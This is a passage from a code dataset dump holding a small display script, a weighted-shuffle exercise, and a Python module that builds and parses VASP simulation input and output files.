Make sure the .ttf font file is in the same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\n#font = ImageFont.truetype('Mario-Kart-DS.ttf', 24)\nwhile True:\n draw.rectangle((0,0,width,height), outline=0, fill=0)\n draw.text((x, top + 8), \"Scan Card\", font=font, fill=255)\n disp.image(image)\n disp.display()\n time.sleep(.1)\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"623911050","text":"# O(N^2) time\n# O(N) space\n#\n# Fisher–Yates shuffle\n\nfrom itertools import accumulate\nfrom random import randint\nfrom bisect import bisect\n\ndef shuffle(A, W):\n acc = list(accumulate(W))\n for i in range(len(A)-1, 0, -1): # i is the index so far not shuffled\n rand = randint(0, acc[-1])\n j = min(bisect(acc, rand), len(A)-1) # rand in which range, we get this position element\n A[i], A[j] = A[j], A[i]\n W[i], W[j] = W[j], W[i] # swap 2 item, index >= i is shuffled array\n acc[j:] = [cum-W[i] for cum in acc[j+1:]] # update accumulate array, remove w[i], from acc[j+1]-W[i]\n return A\n\nA = ['a', 'b', 'c', 'd']\nW = [10, 20, 50, 5] # [10, 30, 80, 85]\nprint(shuffle(A, W))\n\n\ndef shuffle(A):\n acc = list(accumulate([weight for _, weight in A]))\n for i in range(len(A)-1, 0, -1):\n rand = randint(0, acc[-1])\n j = min(bisect(acc, rand), len(A)-1)\n A[i], A[j] = A[j], A[i]\n acc[j:] = [cum - A[i][1] for cum in acc[j+1:]]\n return A\n\nA = [('A', 30), (\"B\", 5), (\"C\", 20)]\nprint(shuffle(A))\n\n# no weight\ndef randomize (arr, n):\n # Start from the last element and swap one by one. We don't\n # need to run for the first element that's why i > 0\n for i in range(n-1,0,-1):\n j = randint(0,i)\n arr[i],arr[j] = arr[j],arr[i]\n return arr\n","sub_path":"Google/shuffle_weighted_array.py","file_name":"shuffle_weighted_array.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"461286205","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module handles VASP Files\ninputを作成するIncar, Posca, Potcar, Kpoints\noutputを読むOszicar, Outcar\n\"\"\"\nfrom __future__ import print_function\n# from __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import generators\n# import sys\n# if sys.version < '3':\n# text_type = unicode\n# binary_type = str\n# else:\n# text_type = str\n# binary_type = bytes\n\n\nimport os\nimport re\nimport math\nimport copy\nimport numpy as np\nimport solid\nfrom commopy import Cabinet, Vector, Bash\n\n#================================Gloval Values================================#\nMODULE_DIR = os.path.dirname(os.path.abspath(__file__))\n#================================Gloval Values================================#\n\n\ndef main():\n \"\"\"\n Execute MakeInputs.all() at current directory.\n \"\"\"\n MakeInputs.all('.')\n\n\nclass Poscar(object):\n \"\"\"\n This class manages VASP POSCAR file.\n elements: elements_list\n num_atoms: num of elements_list\n cell_lattices: lattice parameters 3 * 3 array\n cell_deg\n Correspondece only vasp 5\n Noneを引数にいれるとtemplateファイルを読んでobjを作成する\n 引数poscarはlist型のlinesにも対応\n \"\"\"\n def __init__(self, poscar='POSCAR'):\n if type(poscar) is str:\n try:\n poscar_lines = Cabinet.read_file(poscar)\n except IOError:\n print(\"error: vaspy.Poscar could not \"\n \"find '{0}' file 
!!!\".format(poscar))\n exit()\n elif type(poscar) is list:\n poscar_lines = poscar\n elif poscar is None:\n print(\"POSCAR was not read !!! (Template POSCAR is loaded !!!)\")\n poscar = os.path.join(MODULE_DIR,\n '../sorce/originalsVASP', 'poscar')\n poscar_lines = Cabinet.read_file(poscar)\n self.poscar_title = poscar_lines[0]\n self.cell_scale = float(poscar_lines[1])\n self.cell_lattices = Cabinet.conv_lines2array(poscar_lines[2:5])\n # self.cell_latticesはarrayとして読み込む\n if poscar_lines[5].split()[0].isdigit(): # vasp4\n self.elements = None\n self.num_atoms = [int(x) for x in poscar_lines[5].split()]\n i = sum(self.num_atoms)\n self.cell_sites = Cabinet.conv_lines2array(poscar_lines[7:7+i])\n self.vasp_version = 4\n else:\n self.elements = poscar_lines[5].split() # vasp5\n self.num_atoms = [int(x) for x in poscar_lines[6].split()]\n i = sum(self.num_atoms)\n self.cell_sites = Cabinet.conv_lines2array(poscar_lines[8:8+i])\n self.vasp_version = 5\n\n def __str__(self):\n lines = self.poscar_title\n lines += \" {0:.16f}\\n\".format(self.cell_scale)\n for latt in self.cell_lattices:\n lines += \" {0[0]:.16f} {0[1]:.16f} {0[2]:.16f}\\n\".format(latt)\n lines += \" {0}\\n\".format(\" \".join(self.elements))\n num_atoms = [str(x) for x in self.num_atoms]\n lines += \" {0}\\n\".format(\" \".join(num_atoms))\n lines += \"Direct\\n\"\n for site in self.cell_sites:\n lines += \" {0[0]:.16f} {0[1]:.16f} {0[2]:.16f}\\n\".format(site)\n return lines\n\n def get_atom_fractions(self):\n \"\"\"atomの分率をreturn\"\"\"\n sum_atoms = float(sum(self.num_atoms))\n fractions = [x / sum_atoms for x in self.num_atoms]\n return fractions\n\n def get_cell_volume(self):\n \"\"\"\n Return cell volume\n \"\"\"\n volume = Vector.get_volume(*self.cell_lattices) * self.cell_scale ** 3\n return volume\n\n def get_lattice_length(self):\n \"\"\"\n Return lattice parameters read from POSCAR\n lattices = [a, b, c]\n \"\"\"\n lattices = []\n for latt in self.cell_lattices:\n length = np.linalg.norm(latt) * self.cell_scale\n lattices.append(length)\n return lattices\n\n def get_cell_angle(self):\n \"\"\"\n return lattices angle of unit cell in degree.\n \"\"\"\n gamma = (self.cell_lattices[0], self.cell_lattices[1])\n alpha = (self.cell_lattices[1], self.cell_lattices[2])\n beta = (self.cell_lattices[2], self.cell_lattices[0])\n angles = [Vector.get_angle(x, y) for x, y in (alpha, beta, gamma)]\n return angles\n\n def alt_c_over_a(self, c_over_a):\n \"\"\"\n This method change C over A with fixed cell_volume and B-axis.\n normalize_latticeからnormalize\n c/aはこのときlen_c/cell_scaleとなる\n \"\"\"\n self.normalize_lattice()\n len_c = self.get_lattice_length()[2]\n prev = len_c / self.cell_scale\n self.cell_lattices[2] *= c_over_a / prev\n self.cell_scale /= (c_over_a / prev) ** (1./3)\n print(\"Previous c/a of {} have changed to {}\".format(prev, c_over_a))\n\n def alt_cell_scale(self, scale):\n \"\"\"\n Alt cell_scale parameter\n \"\"\"\n self.cell_scale = scale\n\n def alt_cell_volume(self, volume):\n \"\"\"\n Alt cell_volume\n \"\"\"\n ratio = volume / self.get_cell_volume()\n self.cell_scale *= (ratio) ** (1./3.)\n\n def normalize_lattice(self):\n \"\"\"\n a軸の記述を1, 0, 0に規格化する\n 暫定的に作ったので値のチェックが別途必要\n \"\"\"\n scale = self.get_lattice_length()[0]\n length = self.get_lattice_length()\n angle = self.get_cell_angle()\n\n cos_a, cos_b, cos_g = (math.cos(math.radians(x)) for x in angle)\n sin_g = math.sin(math.radians(angle[2]))\n\n cos_phi = (cos_a - cos_b * cos_g) / sin_g\n cos_theta = ((sin_g ** 2 - cos_a ** 2 - cos_b ** 2 +\n 2 * 
cos_a * cos_b * cos_g) ** 0.5) / sin_g\n\n vec_a = [1, 0, 0]\n vec_b = [cos_g, sin_g, 0]\n vec_c = [cos_b, cos_phi, cos_theta]\n\n self.cell_lattices[0] = vec_a\n self.cell_lattices[1] = vec_b\n self.cell_lattices[2] = vec_c\n\n self.cell_scale = scale\n self.cell_lattices[0] *= length[0] / scale\n self.cell_lattices[1] *= length[1] / scale\n self.cell_lattices[2] *= length[2] / scale\n\n def write_poscar(self, poscar='POSCAR'):\n \"\"\"\n write_poscar(path)\n Make a 'POSCAR' file at 'path'\n \"\"\"\n Cabinet.reserve_file(poscar)\n Cabinet.write_file(poscar, str(self))\n\n\nclass Potcar(object):\n \"\"\"\n This class manages potcar files.\n \"\"\"\n VASP_POT_DIR = os.environ.get('VASP_POTPAW', '')\n\n def __init__(self, elements=None):\n \"\"\"\n Make POTCAR to the 'path' directory.\n pot_lines_list\n Get and set the encut, and rwigs values.\n \"\"\"\n self.psuedo_pot = self.get_psuedo_pot(elements)\n self.potentials_lines = self.read_potcar()\n\n def read_potcar(self):\n \"\"\"\n Several POTCAR files lines are loaded based on self.psuedo_pot list.\n \"\"\"\n path_list = [os.path.join(self.VASP_POT_DIR, x, 'POTCAR')\n for x in self.psuedo_pot]\n potentials_lines = [Cabinet.read_file(x) for x in path_list]\n return potentials_lines\n\n @staticmethod\n def get_psuedo_pot(elements):\n \"\"\"\n Make psuedo_pot list from POT_DICT.\n \"\"\"\n psuedo_pot = [solid.POT_DICT[x] for x in elements]\n return psuedo_pot\n\n def read_rwigs(self):\n \"\"\"\n Read rwigs from POTCAR lines\n \"\"\"\n rwigs = []\n for p_lines in self.potentials_lines:\n keywords = r\"\\s*RWIGS\\s*=\\s*[\\d.]+\\s*;\\s*RWIGS\\s*=\\s*([\\d.]+)\\s*.*\"\n meta = re.compile(keywords)\n lines_iter = iter(p_lines)\n line = next(lines_iter)\n while meta.match(line) is None:\n line = next(lines_iter)\n match_line = meta.match(line)\n rwigs.append(match_line.group(1))\n return rwigs\n\n def read_encut(self):\n \"\"\"\n Read encut from POTCAR lines\n \"\"\"\n encut_list = []\n for p_lines in self.potentials_lines:\n keywords = r\"\\s*ENMAX\\s*=\\s*([\\d.]+)\\s*;\\s*ENMIN\\s*=\\s*[\\d.]+\\s*.*\"\n meta = re.compile(keywords)\n lines_iter = iter(p_lines)\n line = next(lines_iter)\n while meta.match(line) is None:\n line = next(lines_iter)\n match_line = meta.match(line)\n encut_list.append(float(match_line.group(1)))\n encut = max(encut_list)\n return encut, encut_list\n\n def write_potcar(self, path, fname='POTCAR'):\n \"\"\"\n Make a combined single POTCAR file\n \"\"\"\n fname = os.path.join(path, fname)\n out_lines = [x for y in self.potentials_lines for x in y]\n Cabinet.write_file(fname, out_lines)\n\n @staticmethod\n def get_composition(fname='./POTCAR'):\n \"\"\"\n POTCARから元素を読む\n PAW_PBEから始まる行に元素名が記載されているのでそこを読む\n 空行は例外処理でpassする\n \"\"\"\n lines = Cabinet.read_file(fname)\n elements = []\n for line in lines:\n try:\n if line.split()[0] == 'PAW_PBE':\n elements.append(line.split()[1].split('_')[0])\n except IndexError:\n pass\n return elements\n\n\nclass Kpoints(object):\n \"\"\"This class manages KPOINTS file.\"\"\"\n def __init__(self, cell_lattices, dq, is_odd=True):\n \"\"\"Set self.kpoints\"\"\"\n q_vector = [2*math.pi/x for x in cell_lattices]\n kpoints = [int(round(x / dq)) for x in q_vector]\n kpoints_odd = [x + (1 - x % 2) for x in kpoints]\n self.kpoints = {True: kpoints_odd, False: kpoints}.get(is_odd)\n\n def alt_odd(self):\n \"\"\"This attr. 
changes self.kpoints to odd_number\"\"\"\n self.kpoints = [x + (1 - x % 2) for x in self.kpoints]\n\n def alt_size(self, var):\n \"\"\"Each kpoints times var \"\"\"\n self.kpoints = [int(x * var) for x in self.kpoints]\n\n def write_kpoints(self, fname='KPOINTS'):\n \"\"\"Write KPOINTS file using self.kpoints\"\"\"\n kp_lines = ('Automatic mesh\\n0\\nMonkhorst Pack\\n'\n ' {0[0]} {0[1]} {0[2]}\\n 0. 0. 0.\\n'\n .format(self.kpoints))\n Cabinet.write_file(fname, kp_lines)\n\n\nclass IncarReadWriteMixin(object):\n \"\"\"Read & Write INCAR file methods\"\"\"\n @classmethod\n def read_incar(cls, fname):\n \"\"\"\n Read a Incar file, and make a incar_dict.\n \"\"\"\n lines = Cabinet.read_file(fname)\n incar_dict = {}\n for line in lines:\n if line[0] not in ('#', '\\n'):\n para_list = line.split('#')[0].split('!')[0]\n # ^ remove comment_out ^\n para_list = para_list.split()\n key = para_list[0].lower()\n value_list = para_list[2:]\n incar_dict.update({key: value_list})\n cls.__fix_dict(incar_dict)\n return incar_dict\n\n @staticmethod\n def __fix_dict(incar_dict):\n \"\"\"\n 読み込んだincar_dictをintやfloat形式に修正\n \"\"\"\n for key, value in incar_dict.items():\n if len(value) > 1:\n fixed_val = [Cabinet.conv_str(x) for x in value]\n else:\n fixed_val = Cabinet.conv_str(value[0])\n if fixed_val == '.TRUE.':\n fixed_val = True\n elif fixed_val == '.FALSE.':\n fixed_val = False\n incar_dict.update({key: fixed_val})\n\n def make_incform_all(self):\n \"\"\"Make INCAR lines into dict.\"\"\"\n incar_lines = {}\n for key in self.incar_out_list:\n incar_lines.update({key: self.make_incform(key)})\n return incar_lines\n\n def make_incform(self, key):\n \"\"\"Change valuables into INCAR format.\"\"\"\n try:\n var = self.incar_dict[key]\n except KeyError:\n var = None\n if isinstance(var, list):\n var = [str(x) for x in var]\n line = \"{0} = {1}\\n\".format(key.upper(), \" \".join(var))\n return line\n if isinstance(var, bool):\n true = \"{0} = {1}\\n\".format(key.upper(), \".TRUE.\")\n false = \"{0} = {1}\\n\".format(key.upper(), \".FALSE.\")\n line = {True: true, False: false}.get(var)\n return line\n if isinstance(var, (int, str)):\n line = \"{0} = {1}\\n\".format(key.upper(), var)\n return line\n if isinstance(var, (float)):\n line = \"{0} = {1}\\n\".format(key.upper(), var)\n return line\n if isinstance(var, type(None)):\n line = \"\\n\"\n return line\n\n def update(self, extra_dict):\n \"\"\"\n incar_dictをself.updateで要素追加\n __setitem__中に定義したが、\n keyがincar_out_listになければkeyを追加\n \"\"\"\n for key in extra_dict:\n self[key] = extra_dict[key]\n\n def __getitem__(self, key):\n return self.incar_dict[key]\n\n def __setitem__(self, key, var):\n self.incar_dict[key] = var\n if not key in self.incar_out_list:\n self.incar_out_list.append(key)\n\n def __str__(self):\n \"\"\"\n fixed_tagをupdateしてINCARのformatでreturn\n \"\"\"\n self.update(self.cls_fixed_tag)\n self.update(self.fixed_tag)\n lines_dict = self.make_incform_all()\n lines = \"\"\n for key in self.incar_out_list:\n lines += lines_dict[key]\n while lines.count('\\n\\n\\n') != 0:\n lines = lines.replace('\\n\\n\\n', '\\n\\n')\n return lines\n\n def write_incar(self, fname):\n \"\"\"Write INCAR file\"\"\"\n Cabinet.write_file(fname, str(self))\n\n\nclass IncarSwitchTagsMixin(IncarReadWriteMixin):\n \"\"\"\n INCARのtagをSwichによって切り替える\n またIncar_objを呼ぶ前にtagを追加しておきたい場合、\n cls_add* methodsを利用する\n 初期化するときはcls_initializeを使う\n with exit構文で利用できるように整理したい\n \"\"\"\n @classmethod\n def cls_add_extratag(cls, extra_tag):\n \"\"\"\n extra_tagを変更\n 
最初に読み込むのでENCUTなどは適宜INCARで変更される\n \"\"\"\n cls.cls_extra_tag.update(extra_tag)\n\n @classmethod\n def cls_add_fixedtag(cls, fixed_tag):\n \"\"\"\n fixed_tagを変更\n 最後に読み込むので作成されるINCARで全て共通になる\n \"\"\"\n cls.cls_fixed_tag.update(fixed_tag)\n\n @classmethod\n def cls_initialize(cls):\n \"\"\"\n classを初期化する\n \"\"\"\n cls.cls_fixed_tag = {}\n cls.cls_extra_tag = {}\n\n def switch_istart_lwave(self, read_sw=False, write_sw=False):\n \"\"\"\n Set istart, icharg, lwave, lcharg.\n -No read and No write (F, F) use cell relaxation, ibzkp calculation.\n -Read and No write (T, F) use for\n spin orbit and band structure calculations.\n -No read and write (F, T) use for\n pre-spin orbit calculations (spin polarized) and pre-band calculation\n \"\"\"\n read_dict = {True: {'istart': 1, 'icharg': 11},\n False: {'istart': 0, 'icharg': 2}}\n write_dict = {True: {'lwave': True, 'lcharg': True},\n False: {'lwave': False, 'lcharg': False}}\n self.update(read_dict[read_sw])\n self.update(write_dict[write_sw])\n\n def switch_magnetic(self, mag_sw=True):\n \"\"\"\n 磁性計算と非磁性計算の切り替え\n \"\"\"\n mag_dict = {True: {'ispin': 2}, False: {'ispin': 1, 'magmom': None}}\n self.update(mag_dict[mag_sw])\n\n def switch_relax_stracture(self, relax_sw=False, isif=3):\n \"\"\"\n 構造緩和計���を行うかどうかの切り替え\n nsw=10とediffg=-0.005がdefault値\n 振動してしまってなかなか収束しない\n 0.005は結構厳しいのかもしれない...\n directに緩和させる場合はefiffgを整数(default値)にして\n volume依存性から求める場合はediffgを-0.01に変更した\n\n ibrionを2に、encutを1.3倍に変更する\n \"\"\"\n relax_dict = {True: {'encut': self.incar_dict['encut'] * 1.3,\n 'ibrion': 2, 'nsw': 10, 'isif': isif,\n 'ediffg': -0.01},\n False: {'ibrion': None, 'nsw': None, 'isif': None,\n 'ediffg': None}}\n self.update(relax_dict[relax_sw])\n\n def switch_mae_calc_condition(self, mae_sw=True, lmaxmix=4,\n soc_sw=True, saxis=None):\n \"\"\"\n MAE計算の為のswich\n mae_sw=Trueの場合isymなどを0に指定\n \"\"\"\n mae_dict = {True: {'gga_compat': False, 'lmaxmix': lmaxmix,\n 'isym': 0, 'ediff': 1.0e-5},\n False: {'gga_compat': None, 'lmaxmix': None,\n 'isym': None, 'ediff': None}}\n magmom = self.incar_dict['magmom']\n soc_dict = {True: {'lsorbit': True, 'magmom': None, 'saxis': saxis,\n 'ediff': 1.0e-6},\n False: {'lsorbit': False, 'magmom': magmom, 'saxis': None}}\n self.update(mae_dict[mae_sw])\n self.update(soc_dict[soc_sw])\n\n\nclass IncarLoadPoscarObj(IncarSwitchTagsMixin):\n \"\"\"\n Correct parameters from Poscar_object (and Potcar).\n \"\"\"\n cls_extra_tag = {}\n cls_fixed_tag = {}\n incar_out_list = ['system', 's',\n 'npar', 'prec', 'encut', 's',\n 'ispin', 'magmom', 'lsorbit', 'saxis', 's',\n 'gga_compat', 'lmaxmix', 'isym', 's',\n 'nelm', 'nelmin', 'ediff',\n 'ismear', 'sigma', 's',\n 'ibrion', 'nsw', 'isif', 'ediffg', 's',\n 'istart', 'icharg', 'lwave', 'lcharg',\n 'lorbit', 's',\n 'rwigs']\n\n def __init__(self, poscar_obj):\n self.elements = poscar_obj.elements\n self.num_atoms = poscar_obj.num_atoms\n potcar = Potcar(self.elements)\n self.incar_dict = {}\n self.update({'rwigs': potcar.read_rwigs()})\n self.update({'encut': potcar.read_encut()[0]})\n self.update({'system': self.get_formula()})\n self.update({'magmom': self.make_magmom()})\n\n self.update({'npar': 1})\n self.update({'prec': 'Accurate'})\n self.update({'ispin': 2})\n self.update(self.cls_extra_tag)\n self.fixed_tag = {}\n\n def get_formula(self):\n \"\"\"\n Get system name as a chemical formular.\n \"\"\"\n formula = \"\"\n for element, num in zip(self.elements, self.num_atoms):\n if num == 1:\n num = ''\n formula += \"{0}{1}\".format(element, num)\n return formula\n\n def make_magmom(self, 
mag=3):\n \"\"\"Make magmom from num_atoms.\"\"\"\n magmom = [mag for y in self.num_atoms for x in range(0, y)]\n return magmom\n\n\nclass IncarReadPoscar(IncarLoadPoscarObj):\n \"\"\"\n Correct parameters from Poscar file (and Potcar).\n \"\"\"\n def __init__(self, poscar='POSCAR'):\n poscar_obj = Poscar(poscar)\n IncarLoadPoscarObj.__init__(self, poscar_obj)\n\n\nclass MakeInputs(object):\n \"\"\"Make inputs file of series\"\"\"\n @classmethod\n def all(cls, path, incar_obj=None, kp_rx=0.15, kp_soc=0.11):\n \"\"\"\n All pattern of INCAR files are prepared.\n それぞれのパラメータの変更は\n class method \"cls_add_fixedtag\"や\"cls_add_extratag\"を使うか\n incar_objに書き替えたincarを入力\n 省略した場合、path中のPOSCARをbaseに作成\n \"\"\"\n if not incar_obj:\n incar_obj = IncarReadPoscar(os.path.join(path, 'POSCAR'))\n cls.make_potcar_kpoints(path, kp_rx, kp_soc)\n methods = ['relax', 'cell', 'volume', 'volumeE', 'presoc', 'presoc_nc',\n 'ibzkp', 'soc',\n 'dos', 'band', 'static']\n for method in methods:\n getattr(cls, method)(path, incar_obj)\n src_dir = os.path.join(MODULE_DIR, '../sorce/originalsVASP', 'Calc')\n dst_dir = os.path.join(path, 'Calc')\n Bash.copy_dir(src_dir, dst_dir)\n\n @staticmethod\n def relax(path, base):\n \"\"\"For cell optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=3)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_relax')\n incar.write_incar(fname)\n\n @staticmethod\n def cell(path, base):\n \"\"\"For cell optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=4)\n incar['encut'] /= 1.3\n incar['isym'] = 0\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_cell')\n incar.write_incar(fname)\n\n @staticmethod\n def volume(path, base):\n \"\"\"For volume optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=7)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_volume')\n incar.write_incar(fname)\n\n @staticmethod\n def volumeE(path, base): #pylint: disable=C0103\n \"\"\"For volume optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=7)\n del incar.incar_dict['ediffg']\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_volumeE')\n incar.write_incar(fname)\n\n @staticmethod\n def cell_nonmag(path, base):\n \"\"\"For cell optimize calculation with nonmag ver.\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=3)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_magnetic(False)\n fname = os.path.join(path, 'INCAR_cell_nonmag')\n incar.write_incar(fname)\n\n @staticmethod\n def volume_nonmag(path, base):\n \"\"\"For volume optimize calculation with nonmag ver.\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=7)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_magnetic(False)\n fname = os.path.join(path, 'INCAR_volume_nonmag')\n incar.write_incar(fname)\n\n @staticmethod\n def presoc(path, base):\n \"\"\"\n For spin-polarized calculation to generate WAVECAR and CHGCAR\n for non-self consistent soc calculations.\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=True)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n 
incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'ismear': -5})\n fname = os.path.join(path, 'INCAR_presoc')\n incar.write_incar(fname)\n\n @staticmethod\n def ibzkp(path, base):\n \"\"\"\n Make an IBZKP file from a one-iteration calculation under the soc condition.\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4,\n soc_sw=True, saxis=[1, 0, 0])\n incar.incar_dict.update({'nelm': 1})\n incar.incar_dict.update({'nelmin': 1})\n incar.incar_dict.update({'ismear': -5})\n fname = os.path.join(path, 'INCAR_ibzkp')\n incar.write_incar(fname)\n\n @staticmethod\n def presoc_nc(path, base):\n \"\"\"\n Noncollinear calculation to generate WAVECAR and CHGCAR\n for the non-self-consistent soc calculation.\n magmom is assembled as a string for readability.\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=True)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'lnoncollinear': True})\n magmom_tmp = [['0', '0', str(x)] for x in incar.incar_dict['magmom']]\n magmom_3d = \"\"\n for mag in magmom_tmp:\n magmom_3d += \" \".join(mag) + \" \"\n incar.incar_dict.update({'magmom': magmom_3d})\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'ismear': -5})\n incar.incar_out_list.append('lnoncollinear')\n fname = os.path.join(path, 'INCAR_presoc_nc')\n incar.write_incar(fname)\n\n @staticmethod\n def soc(path, base):\n \"\"\"\n For the soc calculation: one INCAR per spin quantization axis.\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=True, write_sw=False)\n incar.incar_dict.update({'ismear': -5})\n saxis_list = ['001', '100', '110', '111']\n for saxis in saxis_list:\n direction = [int(x) for x in saxis]\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4,\n soc_sw=True, saxis=direction)\n fname = os.path.join(path, 'INCAR_soc{0}'.format(saxis))\n incar.write_incar(fname)\n\n @staticmethod\n def dos(path, base):\n \"\"\"\n For the pre-band (DOS) calculation.\n ISMEAR should be 1. (maybe)\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=True)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'lorbit': 2})\n incar.incar_dict.update({'ismear': 1})\n incar.incar_dict.update({'sigma': 0.02})\n fname = os.path.join(path, 'INCAR_dos')\n incar.write_incar(fname)\n\n @staticmethod\n def band(path, base):\n \"\"\"\n For the band calculation.\n ISMEAR should be 1. (maybe)\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=True, write_sw=False)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'lorbit': 2})\n incar.incar_dict.update({'ismear': 1})\n incar.incar_dict.update({'sigma': 0.02})\n incar.incar_dict.update({'ediff': 1.0e-6})\n fname = os.path.join(path, 'INCAR_band')\n incar.write_incar(fname)\n\n @staticmethod\n def static(path, base):\n \"\"\"\n For the static calculation (no relaxation).\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_mae_calc_condition(mae_sw=False, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'isym': 0}) # update incar_dict like every other method here\n fname = os.path.join(path, 'INCAR_static')\n incar.incar_dict.update({'encut': 400})\n incar.write_incar(fname)\n\n @staticmethod\n def make_potcar_kpoints(path, relax=0.15, soc=0.11):\n \"\"\"\n POTCAR and KPOINTS files are made from the POSCAR.\n \"\"\"\n poscar = Poscar(os.path.join(path, 'POSCAR'))\n potcar = Potcar(poscar.elements)\n kpoints_relax = Kpoints(poscar.get_lattice_length(), relax)\n kpoints_reduc = Kpoints(poscar.get_lattice_length(), relax*2)\n kpoints_soc = Kpoints(poscar.get_lattice_length(), soc)\n potcar.write_potcar(path)\n kpoints_relax.write_kpoints(os.path.join(path, 'KPOINTS_relax'))\n kpoints_reduc.write_kpoints(os.path.join(path, 'KPOINTS_relax_reduced'))\n kpoints_soc.write_kpoints(os.path.join(path, 'KPOINTS_soc'))\n\n\nclass Oszicar(object):\n \"\"\"\n Collect data from OSZICAR.\n \"\"\"\n def __init__(self, fname='OSZICAR'):\n self.results = self.get_results(fname)\n\n @staticmethod\n def get_3values(line):\n \"\"\"\n Return the three values nsw, energy and mag from a line.\n The length of the split line tells whether magmom is 3D or scalar.\n \"\"\"\n nsw_num = float(line.split()[0])\n energy = float(line.split()[2])\n if len(line.split()) == 10:\n mag = float(line.split()[9])\n mag = math.fabs(mag)\n elif len(line.split()) == 12:\n mag = [float(x) for x in line.split()[9:12]]\n mag = np.linalg.norm(mag)\n else:\n mag = 0\n return nsw_num, energy, mag\n\n @classmethod\n def get_results(cls, fname='OSZICAR'):\n \"\"\"\n Return the iteration count, nsw number, energy and mag as a dict;\n one entry is appended to the list per relaxation step.\n \"\"\"\n\n lines = Cabinet.read_file(fname)\n keywords = r\"\\s*([\\d]+)\\s+F=\\s*([\\d\\-\\.E\\+]+)\\s+E0=\\s+.*\\s+\"\n meta = re.compile(keywords)\n keywords2 = r\"\\s*DAV:\\s*([\\d]+)\\s+.*\"\n meta2 = re.compile(keywords2)\n results = []\n for i in range(0, len(lines)):\n if meta.match(lines[i]):\n relax_num, energy, mag = cls.get_3values(lines[i])\n j = 1\n while not meta2.match(lines[i-j]):\n j += 1\n iter_num = lines[i-j].split()[1]\n results.append({'iter_num': iter_num, 'nsw_num': relax_num,\n 'energy': energy, 'mag': mag})\n if not results:\n last_val = lines[-1].split()\n if math.fabs(float(last_val[3])) > 1e-5:\n print(\"{0} is unfinished with error. \".format(fname))\n return []\n print(\"{0} is unfinished but converged. \"\n \"(value of mag is invalid)\".format(fname))\n results.append({'iter_num': int(last_val[1]), 'nsw_num': 1,\n 'energy': float(last_val[2]), 'mag': -100})\n return results\n\n\nclass Outcar(object):\n \"\"\"\n Retrieve data from OUTCAR.\n \"\"\"\n def __init__(self, fname='OUTCAR'):\n self.results = self.get_results(fname)\n\n def get_results(self, fname='OUTCAR'):\n \"\"\"\n Retrieve the energy and mag values.\n \"\"\"\n lines = Cabinet.read_file(fname)\n energy = self.get_energy(lines)\n mag = self.get_mag(lines)\n elements = self.get_elements(lines)\n\n results = {'energy': energy, 'mag': mag, 'elements': elements}\n return results\n\n @staticmethod\n def get_mag(lines):\n \"\"\"\n Read the magnetic moment.\n \"\"\"\n key = (r\"\\s*tot\\s+[\\d\\-\\.]+\\s+[\\d\\-\\.]+\"\n r\"\\s+[\\d\\-\\.]+\\s+([\\d\\-\\.]+)\\s*.*\")\n meta = re.compile(key)\n pos = lines.index(\" magnetization (x)\\n\")\n i = 0\n while not meta.match(lines[pos+i]):\n i += 1\n mag = float(meta.match(lines[pos+i]).group(1))\n mag = math.fabs(mag)\n return mag\n\n @staticmethod\n def get_energy(lines):\n \"\"\"\n Read the energy.\n \"\"\"\n key = r\"\\s*free\\s+energy\\s+TOTEN\\s+=\\s+([\\d\\-\\.]+)\\s+eV.*\"\n meta = re.compile(key)\n energy = [meta.match(x).group(1) for x in lines if meta.match(x)]\n energy = float(energy[-1])\n return energy\n\n @staticmethod\n 